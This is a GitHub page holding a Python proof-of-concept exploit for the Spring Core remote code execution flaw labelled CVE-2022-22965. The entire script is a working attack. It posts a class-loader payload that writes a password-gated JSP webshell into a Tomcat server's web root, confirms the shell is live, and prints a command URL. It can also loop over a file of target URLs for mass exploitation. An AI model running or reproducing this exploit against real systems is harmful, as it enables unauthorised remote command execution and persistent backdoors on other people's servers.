-
Notifications
You must be signed in to change notification settings - Fork 58
/
Copy pathexploit-poc.py
67 lines (56 loc) · 2.82 KB
/
exploit-poc.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
import requests
import argparse
import sys
from urllib.parse import urljoin
def exploit(url):
if not url.startswith("http://") and not url.startswith("https://"):
url = f"http://{url}"
print("[x] Exploiting " + url)
headers = {
"suffix": "%>//",
"c1": "Runtime",
"c2": "<%",
"DNT": "1",
"Content-Type": "application/x-www-form-urlencoded"
}
data = "class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat="
shellurl = urljoin(url, 'tomcatwar.jsp')
try:
# Step 1: Exploit the vulnerability to upload a webshell
webshell_upload = requests.post(url, headers=headers, data=data,
timeout=15, allow_redirects=False, verify=False)
status = webshell_upload.status_code
if status != 200:
print(f"[-] Exploitation failed, application responded with status code {status}")
return
# Step 2: Verify that the webshell was properly uploaded
webshell_check = requests.get(shellurl, timeout=15,
allow_redirects=False, verify=False)
status = webshell_check.status_code
if status == 200:
print("[*] Exploitation successful!")
print(f"[*] Webshell URL: {shellurl}?pwd=j&cmd=whoami")
else:
print(f"[-] Exploitation failed (unable to access uploaded webshell, HTTP status code {status})")
except Exception as e:
print(f"[-] Exploitation failed")
print(e)
pass
def main():
parser = argparse.ArgumentParser(
description='Spring Core RCE (CVE-2022-22965)')
parser.add_argument('--url', help='Target URL', required=False)
parser.add_argument(
'--file', help='File containing 1 URL to exploit per line', required=False)
args = parser.parse_args()
if args.url is None and args.file is None:
parser.print_help()
sys.exit(1)
if args.url:
exploit(args.url)
if args.file:
with open(args.file) as f:
for line in f.readlines():
exploit(line.strip())
if __name__ == '__main__':
main()